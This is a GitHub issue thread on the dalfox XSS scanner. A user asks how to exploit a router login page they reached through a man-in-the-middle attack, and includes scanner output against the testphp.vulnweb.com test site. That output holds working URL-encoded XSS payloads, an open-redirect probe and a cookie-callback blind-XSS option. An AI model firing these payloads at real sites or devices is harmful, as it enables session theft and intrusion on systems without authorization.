search

hahwul / dalfox

🌙🦊 Dalfox is a powerful open-source XSS scanner and utility focused on automation.
https://dalfox.hahwul.com
MIT License
3.46k stars 389 forks source link

Scanning Router Login pages #460

Open CHillyVibes opened 1 year ago

CHillyVibes commented 1 year ago

Question

Your questions When I scan a router login page it doesn't show any exploitations availabe but I know that the login page is epxloitable because it is susceptible to XSS during a mitma

Environment

what method is available for me to exploit our given target? thanks dev team btw what parameters would you consider using in order to see the if our payload executed successfully without the url encoding

sudo ./dalfox url http://testphp.vulnweb.com/listproducts.php?cat=1 -b /home/kali/scripts/cookies.js 

_..._

.' .::::. __ : :::::::: | \ / \ | | | / \ V / : :::::::: | o ) o || | | ( o )) ( '. '::::::' |__/|n||__||| _//n\ '-.::''

🌙🦊 Powerful open source XSS scanning tool and parameter analyzer, utility

🎯 Target http://testphp.vulnweb.com/listproducts.php?cat=1 🏁 Method GET 🖥 Worker 100 🔦 BAV true ⛏ Mining true (Gf-Patterns) 🔬 Mining-DOM true (mining from DOM) 🛰 Blind XSS Callback /home/kali/scripts/cookies.js ⏱ Timeout 10 📤 FollowRedirect false 🕰 Started at 2023-03-22 00:54:14.754845369 +0000 UTC m=+0.011778748

[*] 🦊 Start scan [SID:Single] / URL: http://testphp.vulnweb.com/listproducts.php?cat=1 [G] Found dalfox-error-mysql5 via built-in grepping / payload: toOpenRedirecting check the manual that corresponds to your MySQL server version [POC][G][GET][BUILTIN] http://testphp.vulnweb.com/listproducts.php?cat=%2F%2F%2F%2509%2Fgoogle.com [I] Found 2 testing point in DOM base parameter mining [I] Found 1 testing point in Dictionary base paramter mining [I] Content-Type is text/html; charset=UTF-8 [I] Reflected cat param => PTYPE: URL Injected: /inHTML-none(1) $ 48 line: Error: Unknown column '1DalFox' in 'where cl [W] Reflected Payload in HTML: cat='>click 48 line: syntax to use near ''>click' at line 1 [POC][R][GET][inHTML-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%27%3E%3Ca+href%3D%27javascript%26colon%3Balert%281%29%27%3Eclick [V] Triggered XSS Payload (found DOM Object): cat=

1

[POC][V][GET][inHTML-none(1)-URL] http://testphp.vulnweb.com/listproducts.php?cat=1%3Cdiv+contextmenu%3Dxss%3E%3Cp%3E1%3Cmenu+type%3Dcontext+class%3Ddalfox+id%3Dxss+onshow%3Dprompt.valueOf%28%29%281%29%3E%3C%2Fmenu%3E%3C%2Fdiv%3E

hahwul commented 1 year ago

Hi @CHillyVibes Thank you so much for submit issue! I didn't understand the question exactly. Is it a question about false negatives?

Since Dalfox uses different payload combinations, somtimes.. you can also use payloads that require interaction. dalfox try to find an XSS that triggers as soon as it open in browser, preferably, but sometimes it gives me a slightly complicated PoC.

ChillVibesMushroom commented 1 year ago

Hi @CHillyVibes Thank you so much for submit issue! I didn't understand the question exactly. Is it a question about false negatives?

Since Dalfox uses different payload combinations, somtimes.. you can also use payloads that require interaction. dalfox try to find an XSS that triggers as soon as it open in browser, preferably, but sometimes it gives me a slightly complicated PoC.

It's about dalfox not showing vulnerabilities at all but I know the router login page is vulnerable to stored xss and reflected xss because I can inject scripts into the web page and execute scripts from the url bar when doing a mitma and visiting from a target device.

It works wonders against websites showing me vulnerabilities and I have even applied xss attacks with vulnerabilities found and they do exploit the web pages correctly. I'm looking for the same finds when targeting a router with the url being ipv4 192.168.1.1